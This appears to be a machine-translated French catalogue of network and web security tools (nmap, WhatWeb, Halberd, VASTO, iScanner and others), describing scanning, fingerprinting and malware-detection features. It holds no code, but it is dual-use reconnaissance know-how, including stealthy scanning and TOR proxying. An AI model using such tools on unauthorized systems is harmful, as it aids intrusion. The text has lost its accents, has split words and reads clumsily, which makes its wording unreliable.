http://www.softperfect.com/products/networkscanner/ SoftPerfect Network Scanner est un logiciel gratuit IP multi-thread, NetBIOS et SNMP scanner avec une interface moderne et de nombreuses fonctionnalits avances. I l est destin aux administrateurs systme et les utilisateurs en gnral intresss par la s urit informatique. Les pings programme ordinateurs, analyse pour l'coute des ports TCP / UDP et affiche les types de ressources sont partages sur le rseau (y compri s le systme et cachs). En outre, il vous permet de monter les dossiers partags comme des lecteurs rseau, parcourir avec l'Explorateur Windows, filtrer la liste des rsultats et plus encor e. SoftPerfect Network Scanner peut aussi vrifier un port dfini par l'utilisateur et de rendre compte si l'on est ouvert. Elle peut aussi rsoudre les noms d'hte et auto-dtecter votre porte locale et IP externe. Il prend en charge l'arrt distance e t de Wake-On-LAN. Principales caractristiques * Pings ordinateurs et affiche ceux qui sont vivants. * Dtecte les adresses MAC du matriel, mme travers des routeurs. * Dtecte les dossiers cachs partags et ceux en criture. * Dtecte votre internes et externes des adresses IP. * Scans pour couter les ports TCP, UDP et certains services SNMP. * Rcupre actuellement connect sur les utilisateurs, comptes d'utilisateurs configurs , disponibilit, etc * Vous pouvez monter et d'explorer les ressources du rseau. * Peut lancer des applications externes de tiers. Exportations des rsultats au format HTML, XML, CSV et TXT * Supporte le Wake-On-LAN, l'arrt distance et les messages du rseau d'envoi. * Rcupre potentiellement toute l'information via WMI. * Rcupre les informations du Registre distance, systme de fichiers et de gestionnai re de services. * Il est absolument gratuit, ne ncessite aucune installation et ne contient aucun adware / spyware / malware. Vasto http://vasto.nibblesec.org/ VASTO est un Virtualization Assessment Toolkit, un ensemble de modules Metasploi t destin tre utilis comme un outil de test pour effectuer des tests de pntration ou d 'audit de scurit des solutions de virtualisation. Il a t parrain par rseau scuris et prend les contributions des camarades hackers. Whatweb

http://www.morningstarsecurity.com/research/whatweb WhatWeb identifie les sites Web. Son but est de rpondre la question: Qu'est-ce que ce site Web?". WhatWeb reconnat les technologies Web, y compris les systmes de ge stion de contenu (CMS), plateformes de blogs, statistiques / packages d'analyse, bibliothques JavaScript, les serveurs Web et les appareils embarqus. WhatWeb a pl us de 900 plugins, chacun reconnatre quelque chose de diffrent. WhatWeb identifie g alement les numros de version, adresses e-mail, des identifiants, des modules fra mework web, des erreurs SQL, et plus encore. WhatWeb peut tre furtif et rapide, ou approfondie, mais lente.WhatWeb prend en ch arge une agression de niveau pour contrler le commerce entre la vitesse et la fia bilit. Lorsque vous visitez un site Web dans votre navigateur, l'opration comprend de nombreux indices de ce que les technologies du web sont alimenter ce site. P arfois d'une visite unique page web contient des informations suffisantes pour i dentifier ces sites mais si elle ne, WhatWeb peut interroger le site Web de plus . Le niveau par dfaut de l'agression, dite passive, est le plus rapide et ne ncessit e qu'une seule requte HTTP d'un site web. Ceci est appropri pour la numrisation des sites Web publics. modes les plus agressifs ont t dvelopps pour les tests de pntratio n. La plupart des plugins sont WhatWeb approfondie et reconnatre une gamme d'indices du plus subtil au vidente. Par exemple, la plupart des sites WordPress peuvent tr e identifis par le mta-tag HTML, par exemple '', Mais une minorit de sites WordPres s supprimer cette tiquette d'identification, mais cela ne nuit pas WhatWeb. Le Wh atWeb plugin WordPress a plus de 15 tests, qui comprennent la vrification de la f avicon, les fichiers d'installation par dfaut, les pages de connexion et de contrl e pour / wp-content /" dans les liens relatifs. Caractristiques: * Plus de 900 plugins * Contrle le compromis entre la vitesse / furtivit et la fiabilit Plugins * comprennent par exemple les URL * Optimisation de la performance. Contrle le nombre de sites analyser en mme temps . * Formats de journaux multiples: Mmoire (greppable), Verbose (lisible par l'homme ), XML, JSON, MagicTree, RubyObject, MongoDB. * Web rcursive spidering * Proxy soutien, y compris TOR * En-ttes HTTP * Une authentification HTTP basique * Le contrle de redirection web * Nmap style plages d'adresses IP * Fuzzy correspondant * Rsultat de sensibilisation certitude * Custom plugins dfini sur la ligne de commande hallebarde http://halberd.superadditive.com/ Hallebarde dcouvre les quilibreurs de charge HTTP. Il est utile pour l'audit de scu rit des applications web et pour les tests d'quilibrage de la charge de configurat ion. Pour faire face des charges de trafic lourd, les administrateurs de site Web, so uvent installer des dispositifs d'quilibrage de charge. Ces machines se cacher (ve ntuellement) de nombreux serveurs web se cache derrire une adresse IP virtuelle. Ils reoivent des demandes HTTP et les rediriger vers les vrais serveurs web afin de partager le trafic entre eux. Hallebarde est un outil visant dcouvrir de vritables serveurs derrire des adresses IP virtuelles.

iScanner http://iscanner.isecur1ty.org/ iScanner est un outil gratuit open source vous permet de dtecter et supprimer les codes malveillants et des pages web les virus de votre serveur Linux / Unix aut omatiquement et facilement. Cet outil est programm par iSecur1ty en utilisant un langage de programmation Rub y et il est disponible sous les termes de la GNU Affero General Public License 3 .0. S'il vous plat noter que ce site est en construction. vrifier plus tard pour les m ises jour. Caractristiques actuelles: * , * * * * * * Codes malveillants Dtection de pages Web. Cette inclure des balises iframe cache JavaScript, VBScript, ActiveX et les objets codes PHP. Log approfondies dmontrent les fichiers infects et les codes malveillants. Envoyer des rapports par email. Possibilit de nettoyer les pages web infectes automatiquement. Facilit de sauvegarde et de restauration du systme pour les fichiers infects. Simple et base de donnes modifiable en fonction de signature. Possibilit de mettre jour la base de donnes et le programme facilement partir de serveur ddi. * Trs options flexible et facile utiliser. scanner rapide * avec de bonnes performances. * Oui, c'est GRATUIT! nmap http://nmap.org/ Nmap ("Network Mapper") est un libre et open source (licence) utilitaire pour l' exploration du rseau ou l'audit de scurit. De nombreux systmes et les administrateur s rseau trouverez galement utile pour des tches telles que l'inventaire de rseau, ge stion des plannings de mise niveau de service et d'accueil de surveillance ou de disponibilit de service. Nmap utilise des paquets IP de faon novatrice pour dtermi ner quels htes sont disponibles sur le rseau, quels services (nom de l'application et la version) ces htes offrent, les systmes d'exploitation (et leurs versions), ils sont en cours d'excution, ce type de filtres de paquets / pare-feu sont en co urs d'utilisation, et des dizaines d'autres caractristiques. Il a t conu pour parcou rir rapidement de grands rseaux, mais fonctionne trs bien sur une cible unique. Nm ap fonctionne sur tous les principaux systmes d'exploitation informatique et offi cielle paquetages binaires sont disponibles pour Linux, Windows et Mac OS X. nmapsi4 http://code.google.com/p/nmapsi4/ Nmapsi4 est un systme complet bas sur Qt4 Gui avec les objectifs de conception pou r fournir une interface utilisateur complte pour nmap, en vue de la gestion du sc anner toutes les options de scurit de ce puissant net! procnetmonitor http://securityxploded.com/procnetmonitor.php ProcNetMonitor est l'outil gratuit pour surveiller l'activit rseau de tous les pro cessus en cours dans le systme. Il affiche tous les ports d'un rseau ouvert (TCP / UDP) et les connexions rseau actives pour chaque processus. Il a avanc la couleur systme bas analyse automatique pour le rendre facile de distinguer les processus

rseau orient des autres avec un seul coup d'il sur la liste. Nouvelle version prsent e galement caractristique unique "Port Finder" qui le rend facile rechercher port particulier dans tous les processus en cours en un seul clic. Il est galement liv r avec fonction d'exportation pour enregistrer la liste complte des processus de p ort un fichier HTML standard pour l'analyse hors-ligne. Toutes ces caractristiques combines font outil trs efficace dans la lutte contre le s chevaux de Troie et spywares installs sur le systme qui envoient en continu des touches de clavier, les donnes de compte en ligne et autres informations sensible s un serveur distant. Sites web URLvoid http://www.urlvoid.com/ Wepawet http://wepawet.iseclab.org/index.php Wepawet est un service pour la dtection et l'analyse des logiciels malveillants s ur le Web. Il gre actuellement Flash, JavaScript, et fil PDF

Das könnte Ihnen auch gefallen